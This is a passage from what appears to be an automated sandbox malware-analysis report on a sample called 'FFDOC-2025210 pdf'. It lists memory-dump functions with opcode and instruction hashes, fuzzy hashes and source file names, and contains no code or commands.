                                • Snapshot File: hcaresult_2_2_f80000_FFDOC-2025210 pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d117c6500bb56a0a2234740fcc43568db3b0ec96b0436dcef4f5b4756cc1dbe2
                                • Instruction ID: 98b3e8ea1ff61ba0cfa565ef00c2723fcf6925fa80a84464c9e749a268ddfd75
                                • Opcode Fuzzy Hash: d117c6500bb56a0a2234740fcc43568db3b0ec96b0436dcef4f5b4756cc1dbe2
                                • Instruction Fuzzy Hash: EC310570900349DFCB05EFB8EA40AAE7BBAFF85304F108569D405A7355DB349A09CF51
                                Function 00F80F28 Relevance: .1, Instructions: 70COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.3310993641.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_f80000_FFDOC-2025210 pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e33bc5b431be224dec18fce9209d96bfefa1229a285c370739ab5bc6b6afcc59
                                • Instruction ID: 1019a6ca855ed4fa3e0ae8ed5b943c27f02c1f57e55b620af44cc67d5f23c9b4
                                • Opcode Fuzzy Hash: e33bc5b431be224dec18fce9209d96bfefa1229a285c370739ab5bc6b6afcc59
                                • Instruction Fuzzy Hash: 6F219174A00309DFCB05FFB8EA44A9E7BBAFF84304F108929D405A7359DB35AA49CB51
                                Function 00F809CA Relevance: .1, Instructions: 53COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.3310993641.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_f80000_FFDOC-2025210 pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9bdd05d9252aaf27becd9e94561ff95472ba03c170a6f94592e1b6317fa68029
                                • Instruction ID: f3b7645afae45b804d004e82d7d54fce63e18fbb050a7ce0dccbadd66b8894ce
                                • Opcode Fuzzy Hash: 9bdd05d9252aaf27becd9e94561ff95472ba03c170a6f94592e1b6317fa68029
                                • Instruction Fuzzy Hash: 0D1170327007054FCA19AB7994585AE7AE6FF842143108E3DC05ACB2A4DF35DD099B92